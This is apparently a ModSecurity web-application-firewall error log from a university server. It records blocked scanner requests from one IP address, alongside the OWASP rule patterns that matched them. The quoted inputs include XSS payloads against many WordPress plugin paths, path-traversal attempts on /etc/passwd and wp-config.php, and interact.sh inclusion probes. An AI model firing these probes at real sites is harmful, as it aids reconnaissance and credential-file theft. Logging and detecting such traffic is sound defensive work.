[Tue Aug 29 11:55:56.621727 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:s: ax6zt\\x22><script>alert(document.domain)</script>y6uu6"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO16XMCo-f0AAAqeFfMAAAAx"]
[Tue Aug 29 11:55:56.714190 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16XMCo-f0AAAqeFfcAAAAx"]
[Tue Aug 29 11:55:57.667847 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/db-backup/download.php"] [unique_id "ZO16XcCo-f0AAAqTv0YAAAAa"]
[Tue Aug 29 11:55:58.689013 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/webmail/basic/"] [unique_id "ZO16XsCo-f0AAAqY6NkAAAAr"]
[Tue Aug 29 11:55:59.628596 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:p. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:p: <img src onerror=alert(/XSS/)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16X8Co-f0AAAqSw3gAAAAN"]
[Tue Aug 29 11:55:59.786208 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wpbase. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:wpbase: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/sourceafrica/js/window.php"] [unique_id "ZO16X8Co-f0AAApbUsoAAAAh"]
[Tue Aug 29 11:56:01.591504 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22)</ found within ARGS:hostname: \\x22)</script><script>alert(document.domain);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/cgi-bin/login.cgi"] [unique_id "ZO16YcCo-f0AAAqeFgYAAAAx"]
[Tue Aug 29 11:56:01.615382 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:username: test\\x22><svg/onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfh.unla.ac.id"] [uri "/goform/login_process"] [unique_id "ZO16YcCo-f0AAAq@sdcAAAAM"]
[Tue Aug 29 11:56:01.620072 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:wlcms[_login_custom_js]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:wlcms[_login_custom_js]: alert(/XSS/);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO16YcCo-f0AAAqY6OUAAAAr"]
[Tue Aug 29 11:56:02.749076 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:foruserlogin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:foruserlogin: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/dolibarr/adherents/cartes/carte.php"] [unique_id "ZO16YsCo-f0AAAqY6PIAAAAr"]
[Tue Aug 29 11:56:02.782381 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keyword_search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: --!>\\x22  found within ARGS:keyword_search: --!>\\x22 autofocus onfocus=alert(/2Ue0IXhHNjNl9QMpplilzBsRqJA/);//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/properties/"] [unique_id "ZO16YsCo-f0AAArC7dwAAAAW"]
[Tue Aug 29 11:56:03.678389 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:urls[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:urls[]: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16Y8Co-f0AAApbUt8AAAAh"]
[Tue Aug 29 11:56:03.808116 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cat_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:cat_id: 6\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO16Y8Co-f0AAArB1vQAAAAV"]
[Tue Aug 29 11:56:04.644381 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:snum. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:snum: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/featurific-for-wordpress/cached_image.php"] [unique_id "ZO16ZMCo-f0AAArC7egAAAAW"]
[Tue Aug 29 11:56:04.647439 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:sortBy. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:sortBy: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO16ZMCo-f0AAApbUuYAAAAh"]
[Tue Aug 29 11:56:04.694524 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/sap/public/bc/icf/logoff"] [unique_id "ZO16ZMCo-f0AAAqSw5wAAAAN"]
[Tue Aug 29 11:56:05.575419 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:page: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/simpel-reserveren/edit.php"] [unique_id "ZO16ZcCo-f0AAApbUuwAAAAh"]
[Tue Aug 29 11:56:05.743162 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:ID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:ID: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php"] [unique_id "ZO16ZcCo-f0AAAq5@MIAAAAK"]
[Tue Aug 29 11:56:06.811907 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:submit: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php"] [unique_id "ZO16ZsCo-f0AAAqSw64AAAAN"]
[Tue Aug 29 11:56:07.674660 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:tab. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:tab: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO16Z8Co-f0AAAqY6RIAAAAr"]
[Tue Aug 29 11:56:07.739325 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:title_az. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:title_az: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/e-search/tmpl/title_az.php"] [unique_id "ZO16Z8Co-f0AAAq@sgAAAAAM"]
[Tue Aug 29 11:56:08.606783 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/plugins/content/jw_allvideos/includes/download.php"] [unique_id "ZO16aMCo-f0AAAq@sgQAAAAM"]
[Tue Aug 29 11:56:08.643844 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:count: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/goform/activate_process"] [unique_id "ZO16aMCo-f0AAApbUwAAAAAh"]
[Tue Aug 29 11:56:10.730713 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:backurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:backurl: 1 onmouseover=alert(/document.domain/) y="] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfh.unla.ac.id"] [uri "/plugins/template/login.php"] [unique_id "ZO16asCo-f0AAAq5@NYAAAAK"]
[Tue Aug 29 11:56:11.561997 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:returnTo. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:returnTo: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/login.html"] [unique_id "ZO16a8Co-f0AAApXgs0AAAAU"]
[Tue Aug 29 11:56:11.589309 2023] [:error] [pid 2743] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:size. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:size: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/wp-symposium/get_album_item.php"] [unique_id "ZO16a8Co-f0AAAq3a7IAAAAI"]
[Tue Aug 29 11:56:11.679332 2023] [:error] [pid 2743] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:uid: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/login/"] [unique_id "ZO16a8Co-f0AAAq3a7QAAAAI"]
